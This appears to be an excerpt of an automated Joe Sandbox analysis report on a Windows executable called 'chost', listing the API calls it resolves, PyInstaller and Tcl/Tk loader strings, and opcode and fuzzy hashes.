                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                        • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction ID: d6d34ffba79c9cf7b9ae432525aacaa44dc78855b73e51e0693e33ab5c1dc0a1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE029264A1DB0792FA35DB77A8D59B8B2A1EF04765B9481BDD41EC23A0EF3CB548C210
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                        • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction ID: d8c6b062e9219d83e5a2ee686fc4abe43069d8fed9d9821c92c2b84464b22ee0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9313272619B8285EB709F61E8807EE7364FB84744F448439DA4E87B99EF7CD548C710
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385CB5
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A979
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF69437A94F,?,?,?,?,?,00007FF69437A83A), ref: 00007FF69437A99E
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385CA4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F1A
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F2B
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F3C
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                        • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                        • Instruction ID: 165b0f244d4f5d43ebf412c6ee025a54cbd7c9b00b4b973127669f67b7f806e3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FD19D62A1824286EB34AF37D8D11B9A7A1EF84794F44C17DEA4DC7B96DE3CE441C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction ID: 6dbc73b780dc91aa7294d30e8da47bf6571c999bc8b6125a66cbdcfa3ba5e67d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83317432618B8285D770DF36E8802AE73A4FB88754F544139EA9D87B55DF3CD145CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                        • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                        • Instruction ID: 372393b69a4ec3f3c56b15206987a8cba900712ea79a1b66b452bf340369e673
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64B1B722B1C68681EE719B73D4801B9A3A1EB95BE4F449179E99DC7B89EF3CE441C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F1A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F2B
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C
                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF694385F3C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694385638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438564C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3458911817-0
                                                                                                                                                                                                                                        • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                        • Instruction ID: 68bdfe0ab7c59c4bbe90852045afc8a49bb41bb64af145c24a555ec5f711f204
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF513962A1864286E734EF33D8C15A9A661EB48794F44D17DEA4DC7B96DF3CE440CB40
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                        • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction ID: 503c07c0820b53d4637b48a728f68b3aaecd8a7943a55627700934a713639fd3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80111F26B14B06CAEB10CB72E8952B933A4F719758F440E35EA6D867A4EF78D154C340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                        • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                        • Instruction ID: 65bcec95d053b05d47b5cd7ed53d91aaa360ce41da37f5e2ee36db1900e67bd2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CB09220E07A02C2EE182B32ACC221822A4BF48710F9881BCC00CC0330DE2C20E6D700
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                        • Instruction ID: 7e97207ee9b0706e5e9f79474c0693ae9517648d66149c78d4342b4b26069c6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CBF044717182558ADBA88F69A44262977D0FB083D0F40C07DD689C3B44DE3C9061CF04
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365830
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365842
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365879
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436588B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658A4
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658B6
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658CF
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658E1
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658FD
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436590F
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436592B
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436593D
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365959
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436596B
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365987
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365999
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659B5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659C7
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                        • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction ID: 3a5623702a2c4a47feeda6c6c4281f3a1de03cf2bc08da220e03fc71c303ca39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A22B564A49B0781FA39DB77B8E557472A0EF14791F54D4BDD81EC2BA0EF3CA548D200
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439
                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6943688A7,?,?,00000000,00007FF694363CBB), ref: 00007FF69436821C
                                                                                                                                                                                                                                          • Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                        • Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                        • Instruction ID: 19881956d4b0b640426b40011f359a08836b6217a42781f4b400ced101d51cec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A51A461A2D64381FB74AB37E8D26BA7260EF98784F54C579E90EC26D5EE2CE404C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction ID: 877da75f18e5e8b3eee9767dd813e20d2e9a208c22d3939476ce08ce795968ee
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9551E726604BA186D6349F37E4581BAB7A1F798B61F008125EFDE83795DF3CD085DB10
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
